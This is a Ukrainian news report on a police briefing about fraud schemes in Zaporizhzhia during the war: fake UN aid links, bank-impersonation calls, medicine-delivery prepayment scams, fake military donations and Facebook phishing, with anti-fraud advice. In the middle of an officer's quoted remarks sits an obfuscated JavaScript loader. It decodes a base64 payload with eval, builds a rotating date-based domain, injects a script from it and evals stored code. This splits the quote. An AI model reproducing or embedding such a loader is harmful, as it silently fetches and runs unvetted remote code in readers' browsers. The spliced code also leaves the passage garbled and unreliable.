У ГУНП назвали головні схеми аферистів у Запоріжжі: як не потрапити на «гачок» шахраїв (РЕПОРТАЖ)

За час повномасштабного вторгнення РФ проблема шахрайства в Україні стала актуальною як ніколи — регулярно з’являються нові схеми аферистів: шахраї під видом «фондів» з фінансової допомоги від ООН або «співробітників банків» виманюють та викрадають гроші громадян.

Так, у Запоріжжі відбувся брифінг щодо протидії шахрайству та потенційних ризиків в умовах воєнного стану, на якому представники Нацполіції назвали статистику щодо таких злочинів, розповіли про найпоширеніші схеми аферистів і пояснили, як не стати їх жервтою. Про це все — детально в репортажі Портала Акцент.

Брифінг: яка ситуація з шахрайством у Запоріжжі та області

У середу, 26 липня, в офіційному Медіацентру при ОДА відбувся брифінг начальника відділу управління карного розшуку ГУНП в Запорізькій області підполковника поліції Олексія Сичова та начальника відділу комунікації ГУНП в Запорізькій області капітана поліції Анни Ткаченко: як вже зазначено вище, на цьому заході порушувалися питання стосовно протидії шахрайству та потенційних ризиків в умовах воєнного стану.

За словами Анни Ткаченко, наразі проводиться активне інформування жителів Запоріжжя та області про активізацію шахраїв та ризики, які несуть дії аферистів.

«Всі ви бачите, що по місту розміщені білборди, сітілайти, якщо не помиляюся, десь 15 було розміщено — це саме Нацполіція, а сітілайтів по місту також було розміщено десь близько двох десятків. Щодня майже наші дільничні офіцери поліції, ПОГівці, тобто всі знають — це наша служба, це місцеві «шерифи» — поліцейські громад, яким довіряє населення, які безпосередньо щодня працюють з будь-якими категоріями мешканців населених пунктів, які вони обслуговують: вони їм (місцевим жителям — ред.) розносять листівки, проводять інформаційно-роз’яснювальні бесіди — і це тільки маленька така частина роботи, яку ми щодня проводимо, результат є. Але результат не той, який ми хотіли бачити», — зазначила начальник відділу комунікації ГУНП в Запорізькій області.

Начальник відділу комунікації ГУНП в Запорізькій області капітан поліції
Анна Ткаченко. Фото: Акцент.

Олексій Сичов надав статистичні дані безпосередньо щодо правопорушень, пов’язаних з шахрайством у Запорізькій області: так, за його інформацією, початку 2023 року поліцейські зареєстрували 1700 заяв запоріжців, які були ошукані аферистами, а 206 справ вже були передані до суду — внесені до Єдиного реєстру судових розслідувань і наразі здійснюється досудове розслідування за такими фактами. Він зазначив, що з числа зареєстрованих поліцією вже розкрито 206 шахрайств на сьогодняшній день.

За словами начальника відділу управління карного розшуку ГУНП в Запорізькій області, наразі понад 80% злочинів, пов’язаних з шахрайством, носять «міжрегіональний характер» — зловмисники діють з різних регіонів країни:

«Чому складається така ситуація? Тому що понад 80% шахрайств, які реєструються, вони носять міжрегіональний характер: шахрай, як представник злочинного середовища, знаходиться на території іншої області, а при цьому шляхом здійснення телефонних дзвінків, шляхом розсилання фішингових посилань, викладення певної інформації на певних платформах у мережі інтернет щодо купівлі або продажу товарів вводить людей в оману на території інших областей, у тому числі — на території і Запорізької області.

Відповідно, це механізм, який передбачає процес розслідування за кримінальним провадженням за статтею 190, він є таким достатньо ємким і для того, щоб нам добігти, втановити конкретну особу шахрая, це займає значний проміжок часу, особливо, якщо це злочин міжрегіональний. І це все носить такий досить затяжний характер і впливає відповідно на результати роботи».

Начальник відділу управління карного розшуку ГУНП в Запорізькій області підполковник поліції Олексій Сичов. Фото: Акцент. «Допомога від ООН» і «доставка ліків»: які схеми шахраїв є найпоширенішими зараз?

За словами підполковника поліції, наразі, за час воєнного стану, шахрайство зазнало змін і «трансформувалося». Зокрема, він розповів про шахрайські схеми, які набули особливої поширеності за час повномасштабної війни: до таких відносяться випадки, коли аферисти під видом надання допомоги ошукують громадян в мережі інтернет, отримуючи їх банківські дані — номера карткового рахунку і допоміжний CVV-код, після чого викрадають гроші.

«Особливо під час воєнного стану шахрайство трансформувалося — тобто, шахраї є досить гарними психологами, вони реагують на той запит громадян і, відповідно, під час воєнного стану у нас особливого розповсюдження набув такий вид шахрайства, як надання допомоги.

Найбільш часті випадки, які ми реєструємо — це допомога від ООН, коли людина на свій телефон, або ж ознайомлюючись з інформацією по групах, створених внутрішньо переміщеними особами, знаходить відповідне посилання, переходить за ним, щоб отримати допомогу, вводить реквізити своєї банківської картки — це номер карткового рахунку і допоміжний CVV-код. Отримуючи цю інформацію, шахраї отримують доступ до карткового рахунку конкретного громадянина і здійснюється заволодіння грошовими коштами».

До слова, як вже раніше інформував Акцент, в УВКБ ООН у Запоріжжі звернулися до громадян та попередили про небезпеку електронного шахрайства з грошовими виплатами: так, у пресслужбі зазначалося, що у зв’язку з великою кількістю різних програм грошової допомоги, що впроваджуються на території України, почастішали випадки електронного шахрайства.

«Будьте пильними»: в ООН попередили жителів Запоріжжя про шахрайство з виплатами

Водночас, Олексій Сичов зазначає, що наразі вкрай поширеною схемою аферистів є також шахрайство «під виглядом працевлаштування на роботу, пасажирських перевезень, доставки ліків«:

«Також, найбільш розповсюдженою на сьогодняшній день є шахрайство, яке вчиняється під виглядом працевлаштування на роботу, пасажирських перевезень, доставки ліків на тимчасово окуповані території. Тобто громадяни, чиї батьки, наприклад, залишилися на тимчасово окупованих територіях, розуміючи проблематику з лікарськими засобами, намагаються якось передати батькам такі ліки. Як правило, у більшості випадків вони мають справу з шахраями, які обіцяють їх доставити, але ж у більшості випадків прохають «зкинути» передоплату, заволодівають цими коштами і, відповідно, нічого не доставляється і такі «послуги» не здійснюються», — сказав підполковник.

Водночас, за словами начальника відділу управління карного розшуку ГУНП, одними з найпоширеніших схем під час воєнного стану залишаються шахрайство під виглядом донатів на ЗСУ. Представник ГУНП наголошує, що громадянам перед перерахуванням коштів вкрай важливо перевіряти інформацію про волонтерів, благодійні фонди чи громадські організації.

«Також, підрозділами поліції постійно проводиться роз’яснювальна робота з громадянами, в тому числі із залученням представників банківських установ, яким чином ми можемо запобігти шахрайству, яку інформацію ми можемо проігнорувати, яка надається шахраями, а на яку інформацію нам необхідно звертати увагу, здійснюючи купівлю або продаж товарів у мережі інтернет. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Дуже розповсюдженими є факти шахрайств, які вчиняються під виглядом донатів на потреби Збройних сил: тобто, коли ми маємо бажання здійснити донат, ми обов’язково повинні мати повну інформацію, яку ми можемо отримати про волонтера чи благодійну організацію, яка здійснює збір грошових коштів для забезпечення тих чи інших потреб. Якщо це благодійний фонд, то, відповідно, необхідно ознайомитися з інформацією в мережі інтернет. Якщо це якась громадська організація, багато такої інформації є у представників органів місцевого самоврядування, в управліннях соціального захисту населення. Якщо це волонтерська група і ця група дійсно здійснює свою діяльність у правовому полі та має такі благі наміри, то про цю групу буде достатньо багато інформації у соцмережах з відповідними фотозвітами та їх результатами роботи. Тобто, обов’язково треба максимально отримати інформацію щодо осіб, які здійснюють збір грошових коштів для забезпечення тих чи інших потреб», — підсумував Олексій Сичов.

Також, начальник відділу комунікації ГУНП в Запорізькій області капітан поліції Анна Ткаченко відносить до одних з поширених видів шахрайства обман з проханням нібито «зробити дзвінок»: коли, наприклад, зловмисник звертається до перехожого на вулиці з відповідним проханням, а після отримання в свої руки гаджета особи просто тікає:

«Це теж різновид шахрайства. Це не тільки фінансовий момент, ошукання в плані грошей (…) Це теж є проявом шахрайства».

Олексій Сичов розповів про ще одну поширену шахрайську схему — під виглядом співробітника банку, а також розповів про принцип дії зловмисників у таких випадках:

«Також, хочеться продовжити сказане раніше — це саме коли шахрай здійснює телефонний дзвінок під виглядом співробітника банку: і при цьому громадянин на свій мобільний телефон отримує дзвінок нібито з міського номеру — наприклад, з цифровим вираженням «044», чи «056» (Дніпропетровська область) і громадяни сприймають це дійсно як дзвінок з відповідної банківської установи і довірливо до цього відносяться. Але зазначаємо, що це є номери SIP-телефонів так званих, які мають визначення відповідного номеру, і шахраї таким чином вводять в оману громадян, отримують доступ до їхніх карток, коли людина для себе уявляє, що вона дійсно спілкується зі співробітником банку, заходить до відповідного мобільного додатку, підтверджує операції, при цьому, вона спілкується з шахраєм, який здійснює транзакцію з переведенням коштів з одного банку до іншого».

Скільки грошей вкрали шахраї у запоріжців з початку року?

За словами Олексія Сичова, з початку 2023-го року сума збитків, які завдали шахраї на території Запорізької області, складає понад вісім мільйонів — і це тільки статистика на основі офіційної інформації.

«Сума шкоди заявникам обчислюється в мільйони гривень і якщо говорити конкретно по території Запорізької області, то це сума понад вісім мільйонів гривень — це збитки, які завдали нашим людям», — зазначив він.

«Як зазначили спікери, з початку року шахрайськими діями населенню регіону завдано збитків на суму понад 8 млн грн, але ця сума не є показовою, адже не всі громадяни звертаються до поліції», — також зазначили і на сайті Запорізької ОВА.

Як додала Анна Ткаченко, є люди, які «соромляться повідомляти про те, що їх ошукали», або не звертаються через дрібні суми. Представниця поліції також навела приклад: коли шахраї просять внести передплату в умовні 150 гривень, людина вносить, але після того, як виявляється, що її просто ошукали, вона не вважає за потрібним звертатися до правоохоронних органів. Саме тому названа цифра збитків, яких було завдано громадянам з боку шахраїв з початку поточного року, «більш-менш загальна і вона може бути не об’єктивною і не дуже достовірною».

Шахрайство у Запоріжжі: скільки викрито аферистів

Згідно з наведеними даними начальника відділу управління карного розшуку ГУНП в Запорізькій області, за 2023 рік всього встановлено 206 осіб, які вчинили шахрайські дії, а найпоширенішим є шахрайство безпосередньо в мережі інтернет.

«Співробітниками поліції у 2023 році встановлено 206 осіб, які вчинили шахрайські дії, відповідно, відносно вказаних осіб кримінальні провадження направлені до суду. (…) Найчастіше сьогодні ми реєструємо факти, які найбільш розповсюджені — це купівля-продаж товарів в інтернеті або надання послуг. Інформаційне суспільство має свій розвиток і злочинне середовище на це реагує», — пояснив Олексій Сичов.

Фішинг у Facebook: попередження для запоріжців

Водночас, у пресслужбі Патрульної поліції Запорізької області опублікували інформацію щодо поширення фішингу у Facebook: так, шахраї «масово відмічають публічні сторінки або надсилають користувачам спам-повідомлення з текстом: «Подивіться, хто загинув у ДТП, я думаю, ви його знаєте, так шкода…».

Довідка: Фішинг — це вид інтернет-шахрайства, який полягає в крадіжці конфіденційних даних користувачів мережі Інтернет. Найчастіше аферисти, які займаються фішингом, видають себе за банки чи інші установи, щоб змусити жертву заповнити фальшиву форму та отримати дані облікових записів.

У Патрульній поліції надали поради громадянам, як вберегти себе від шахраїв:

у жодному разі не переходьте за посиланням сумнівного типу. Якщо ви отримали таке повідомлення, потрібно надіслати скаргу на допис та заблокувати джерело його розповсюдження;ніколи й нікому не повідомляйте свої особисті та банківські дані;для захисту інтернет-акаунтів використовуйте складні паролі, які містять літери верхнього та нижнього регістру, цифри та символи. Не встановлюйте однаковий пароль для декількох акаунтів. Налаштуйте двофакторну аутентифікацію всюди, де є така можливість. Тоді для входу до акаунта, крім логіна та пароля, потрібно ввести код-підтвердження, що приходить на телефон, електронну скриньку або у відповідний додаток;майте звичку перевіряти інформацію та користуватися офіційними джерелами;подбайте про захист фінансового номера. Забороніть віддалений перевипуск SIM-карти у мобільного оператора або перейдіть на контрактне обслуговування;завантажуйте програми й застосунки лише з офіційних джерел. Використовуйте антивірусне програмне забезпечення. Вчасно оновлюйте операційну систему.

Побачити фото та відео Акцента з брифінгу щодо протидії шахрайству та потенційних ризиків в умовах воєнного стану можна нижче.

Фото: Акцент.

Репортаж підготував Олександр Коваль. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-gunp-nazvali-golovni-shemi-aferistiv-u-zaporizhzhi-yak-ne-potrapiti-na-gachok-shahrayiv-reportazh/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top